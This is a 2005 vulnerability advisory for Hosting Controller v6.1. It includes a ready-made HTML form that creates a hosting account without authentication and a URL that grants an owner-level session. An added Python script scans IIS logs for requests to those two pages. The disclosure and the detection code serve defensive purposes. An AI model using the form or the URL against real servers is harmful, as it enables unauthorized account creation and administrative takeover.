Bug Hosting Controller New (v6.1 - Hotfix 2.1)
-= KeHieuHoc - HCE GROUP =-
Information
-------------------------
Software Package : Hosting Controller
Vendor Homepage : http://www.hostingcontroller.com
Platforms : Windows based servers
Vulnerability : Multiple unauthenticated information disclosure
Risk : high
Vulnerable Versions: All versions (Tested on: v.6.1 Hotfix 2.1)
Vendor Contacted : 09/07/2005
Release Date : 11/07/2005
Summary
------------
Hosting Controller is a complete array of Web hosting automation tools for
the Windows Server family platform.
(I)
You can create a new account on Hosting Controller.
Exploit :
http://[target]/admin/hosting/addsubsite_online.asp
Code Form:
<FORM action="http://[target]/admin/hosting/addsubsite_online.asp"
method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM>
(II)
You can create any "session" that is reserved for the system owner.
Exploit :
http://[target]/admin/hosting/dsp_newreseller.asp
(I) and (II) -> have fun
Solution
----------
The vendor was notified and has released a patch.
Update your software.
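
Added example (not part of the original advisory and not vendor code): to check whether the pages named in (I) and (II) were requested before the patch was applied, the Python script below scans web server logs for the two paths and reports who reached them.
Assumptions: the server writes W3C extended logs with a "#Fields:" header (the IIS default), and the sample log lines are constructed for illustration.

```python
from urllib.parse import unquote

# Paths named in the advisory; IIS treats URL paths case-insensitively.
WATCHED = {
    "/admin/hosting/addsubsite_online.asp": "(I) account creation",
    "/admin/hosting/dsp_newreseller.asp": "(II) owner-level session",
}

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-12 08:14:02 192.0.2.10 GET /default.asp - 200
2005-07-12 08:15:40 198.51.100.7 POST /Admin/Hosting/AddSubsite_Online.asp - 200
2005-07-12 08:16:05 198.51.100.7 GET /admin/hosting/dsp_newreseller.asp - 200
2005-07-12 08:17:31 203.0.113.9 GET /admin/hosting/addsubsite_online.asp - 404
"""


def find_hits(lines):
    """Return one record per logged request that reached a watched page."""
    fields, hits = [], []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column layout may change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # Decode escapes, unify slashes and case so spelling variants match.
        stem = unquote(row.get("cs-uri-stem", "")).replace("\\", "/").lower()
        issue = WATCHED.get(stem)
        if issue:
            status = row.get("sc-status", "")
            hits.append({
                "when": f"{row.get('date', '')} {row.get('time', '')}",
                "client": row.get("c-ip", ""),
                "method": row.get("cs-method", ""),
                "status": status,
                "issue": issue,
                # 2xx/3xx: the page was served, so follow up on this request.
                "served": status[:1] in ("2", "3"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG.splitlines()):
        print(hit)
```

Any served POST to addsubsite_online.asp is worth comparing against the accounts that exist in the control panel.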
Credits
---------
Discovered on 9 July 2005 by KeHieuHoc - HCE Group
Email: kehieuhoc@xxxxxxxxx
References
-------------
http://hcegroup.net
------------------------------ // KeHieuHoc - HCE Group \\
------------------------------